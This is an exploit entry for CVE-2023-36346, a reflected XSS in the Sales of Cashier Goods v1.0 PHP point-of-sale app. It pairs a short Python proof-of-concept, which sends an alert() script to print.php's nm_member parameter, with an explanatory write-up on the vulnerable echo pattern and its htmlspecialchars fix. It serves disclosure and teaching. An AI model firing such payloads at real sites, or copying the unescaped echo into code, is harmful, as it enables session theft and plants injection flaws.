Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)Understanding Cross-Site Scripting (XSS) in Sales of Cashier Goods v1.0: A Deep Dive into CVE-2023-36346
Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous vulnerabilities in web application security. In June 2023, a critical XSS flaw was identified in Sales of Cashier Goods v1.0, a PHP-based point-of-sale (POS) system developed by Codekop. The vulnerability, assigned CVE-2023-36346, highlights how even seemingly simple input handling can lead to severe security breaches.
Overview of the Vulnerable Application
The Sales of Cashier Goods v1.0 application is designed for small retail businesses to manage sales, inventory, and customer records using PHP and MySQL. It includes a /print.php endpoint that generates receipts or invoices based on user input, specifically the nm_member parameter.
According to the exploit author, Amirhossein Bahramizadeh, the application fails to sanitize user input before rendering it in the output page. This oversight allows attackers to inject malicious scripts directly into the web page, potentially compromising user sessions, stealing data, or redirecting users to phishing sites.
Exploit Mechanics: The XSS Payload
When an attacker sends a crafted request with a malicious payload via the nm_member parameter, the application echoes the input directly into the HTML response without proper validation or escaping. This creates a classic reflected XSS scenario.
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
payload = urllib.parse.quote(payload)
params = {
"nm_member": payload
}
response = requests.get(url, params=params)
print(response.text)
This Python script demonstrates how an attacker can exploit the vulnerability. The urllib.parse.quote() function encodes the payload to ensure it is safely transmitted in the URL. When the server processes the request, it outputs the script directly in the HTML, triggering the alert() popup in the victim’s browser.
Why this is dangerous: While the alert is harmless in testing, real-world payloads can include document.cookie extraction, fetch() calls to exfiltrate data, or even eval() to execute arbitrary code. Such scripts can be injected via phishing links, malicious advertisements, or even through social engineering.
Security Implications and Real-World Impact
For a POS system, XSS vulnerabilities are particularly dangerous because they can:
- Steal session tokens or authentication cookies, allowing attackers to impersonate users.
- Redirect users to fake login pages (phishing attacks).
- Inject malware via scripts that download malicious payloads.
- Modify transaction data in real-time, leading to financial fraud.
Given that this system is deployed in retail environments across Iran and potentially other regions, attackers could exploit this flaw to compromise multiple businesses simultaneously — especially if the application is used in shared or public networks.
Root Cause Analysis
The core issue lies in the lack of input sanitization and output encoding. The application uses the $_GET['nm_member'] variable directly in HTML output without escaping special characters. For example:
echo "Member Name: " . $_GET['nm_member'];
This code snippet is vulnerable because it fails to escape characters like <, >, ", and &, which are essential for preventing script injection.
Recommended Fixes and Best Practices
To prevent such vulnerabilities, developers should implement the following security measures:
- Input validation: Ensure that only expected data types (e.g., alphanumeric strings) are accepted.
- Output encoding: Use functions like
htmlspecialchars()in PHP to escape HTML entities. - Content Security Policy (CSP): Implement a CSP header to restrict script execution to trusted sources.
- Use parameterized queries: Avoid direct user input in SQL or HTML contexts.
Corrected code example:
<?php
$member_name = htmlspecialchars($_GET['nm_member'], ENT_QUOTES, 'UTF-8');
echo "Member Name: " . $member_name;
?>
This version ensures that any special characters in the input are rendered as literal text, preventing script execution.
Conclusion: Lessons from CVE-2023-36346
Despite being a relatively simple application, Sales of Cashier Goods v1.0 serves as a stark reminder that security cannot be assumed in open-source or low-cost software. Even minor oversights in input handling can lead to catastrophic outcomes.
For developers and organizations deploying such systems, the key takeaway is: never trust user input. Always sanitize, validate, and encode data before rendering it in any context — especially in web applications that handle sensitive information.
Security is not a one-time fix; it’s an ongoing practice. Regular audits, penetration testing, and adherence to OWASP guidelines are essential to protect against evolving threats like XSS.